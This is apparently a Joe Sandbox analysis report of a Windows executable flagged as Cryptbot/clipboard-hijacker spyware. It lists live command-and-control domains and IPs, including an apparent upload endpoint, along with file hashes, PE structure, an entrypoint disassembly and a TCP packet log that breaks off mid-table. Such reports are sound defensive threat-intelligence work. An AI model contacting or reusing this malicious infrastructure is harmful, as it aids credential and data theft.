                            		14618AMAZON-AESUSfalse
                            34.118.84.150
                            		home.twentykx20pt.topUnited States
                            		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1564519
                            Start date and time:2024-11-28 13:08:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 5m 40s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:4
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            07:09:27API Interceptor431x Sleep call for process: file.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            18.213.123.165file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                              file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          file.exeGet hashmaliciousPureCrypter, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                34.118.84.150file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousCryptbotBrowse
                                                • twentykm20sr.top/v1/upload.php
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737
                                                file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737?argument=3SvRMencu61cyg6M1732734428
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • home.twentykm20sr.top/iYUeIWtRvzKHTkiRYPPG1732630737?argument=bFHSCzLyg7vU1u9w1732732876

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                httpbin.orgfile.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.213.123.165
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 18.213.123.165
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.208.8.205
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.208.8.205
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.213.123.165
                                                file.exeGet hashmaliciousCryptbotBrowse
                                                • 18.208.8.205
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.213.123.165
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.213.123.165
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 18.208.8.205
                                                file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                • 18.213.123.165

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.118.84.150
                                                https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                • 34.117.59.81
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 34.117.188.166
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 34.117.188.166
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.118.84.150
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 34.117.188.166
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 34.117.188.166
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 34.117.188.166
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 34.117.188.166
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 34.118.84.150
                                                AMAZON-AESUSFACTURE NON PAYEE.pdfGet hashmaliciousUnknownBrowse
                                                • 50.16.47.176
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.213.123.165
                                                invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                • 18.208.156.248
                                                https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                • 54.226.114.88
                                                botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 35.172.163.142
                                                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 52.20.129.235
                                                https://important-wholesale-dress.glitch.me#clerk@tkbtc.co.ukGet hashmaliciousUnknownBrowse
                                                • 34.233.54.162
                                                file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                • 18.208.8.205
                                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 23.22.218.104
                                                arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 100.24.75.163

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.984748897106969
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:4'490'752 bytes
                                                MD5:2ba6fe9428da32103bb44c955939208d
                                                SHA1:145b071306f5ad32a9385ff9f89bae6a1ec968e9
                                                SHA256:1d64908fcbd9560615576da2b9b41ce76fafb939a0f04f559301a1946db4e936
                                                SHA512:044e8a36a5e03c9c406a4b3f2fdcd3057412875e1ebd4456aeb257bf622570826c665206d0ac5468ee6bf5b5642910a3c41a08cfdd7fc9c711561d31322854f0
                                                SSDEEP:98304:cu7lQqtvReOFQylDgN/8EZEKwfG4tp+WWU/rQh1D:cu795eygxefG42WWVh1
                                                TLSH:A12633EB6420FCA3F4E6F83038427EB5686956DA186F24D7710E65732B87C9243189FD
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.Gg...............(..H..Bm..2...@........H...@..........................p........D...@... ............................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x1004000
                                                Entrypoint Section:.taggant
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x6747F452 [Thu Nov 28 04:40:50 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                Entrypoint Preview

                                                Instruction
                                                jmp 00007F70F105CC3Ah
                                                pcmpgtb mm0, qword ptr [eax+eax+00h]
                                                add byte ptr [eax], al
                                                add cl, ch
                                                add byte ptr [eax], ah
                                                add byte ptr [eax], al
                                                add byte ptr [ebx], al
                                                or al, byte ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], dh
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax+eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                or byte ptr [eax+00000000h], al
                                                add byte ptr [eax], al
                                                adc byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add ecx, dword ptr [edx]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x6ab05f0x73.idata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6aa0000x2b0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc02d280x10dkqxmldn
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0xc02cd80x18dkqxmldn
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                0x10000x6a90000x283a000d023b49ee735932e1647b7f4ec9dde8unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x6aa0000x2b00x2005dc969c906bebf1c1c14e8ec4d27834dFalse0.80078125data6.0329086636308356IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .idata 0x6ab0000x10000x200f31454e455ed73deb27ce21410c73ef5False0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                0x6ac0000x3960000x200702b0bf8fe04520c0774bc2ebc3df075unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                dkqxmldn0xa420000x1c10000x1c10005a7fd3200635cf16538ad1a487d3e733False0.9945288575306236data7.95546200906979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                ajwrokqy0xc030000x10000x400ac34852ebceddb383f05938df2ffa1f8False0.7587890625data6.042933344826828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant0xc040000x30000x2200c915f6ee84120fda09cca0d89ab31a2eFalse0.06008731617647059DOS executable (COM)0.7258707509838483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_MANIFEST0xc02d380x256ASCII text, with CRLF line terminators0.5100334448160535

                                                Imports

                                                DLLImport
                                                kernel32.dlllstrcpy

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 28, 2024 13:09:00.283452034 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:00.283498049 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:00.283797026 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:00.339190006 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:00.339205980 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.144397974 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.145040035 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.145087957 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.147411108 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.147485018 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.149013042 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.149245977 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.158286095 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.158303022 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.201311111 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.791451931 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.791619062 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:02.791696072 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.927747011 CET49704443192.168.2.518.213.123.165
                                                Nov 28, 2024 13:09:02.927781105 CET4434970418.213.123.165192.168.2.5
                                                Nov 28, 2024 13:09:04.817421913 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:04.939341068 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:04.943403959 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:04.944519997 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.064898968 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.064958096 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.064963102 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.065012932 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065013885 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.065023899 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065071106 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.065108061 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065118074 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065166950 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.065195084 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065218925 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065252066 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.065268040 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.065318108 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.065371990 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.184781075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.184890985 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.185003996 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.185056925 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.185058117 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.185082912 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.185106039 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.185234070 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.185252905 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.185282946 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.185297966 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.185305119 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.185358047 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.227130890 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.227569103 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.347157001 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.347356081 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.391132116 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.511205912 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.511266947 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.715178013 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.715236902 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:05.967173100 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:05.967231989 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.223543882 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.223617077 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.479182005 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.479387045 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.584913969 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.585105896 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.585177898 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.599431038 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.599489927 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.705837965 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705849886 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705861092 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705881119 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705998898 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706037045 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706037998 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706082106 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706083059 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706095934 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706104040 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706125021 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706130028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706178904 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706284046 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706331968 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706341028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706367016 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706387043 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706417084 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706417084 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706469059 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706513882 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706562042 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706648111 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706657887 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706695080 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706727982 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706815958 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706861019 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706937075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706990957 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707077026 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707156897 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707245111 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707344055 CET804970534.118.84.150192.168.2.5
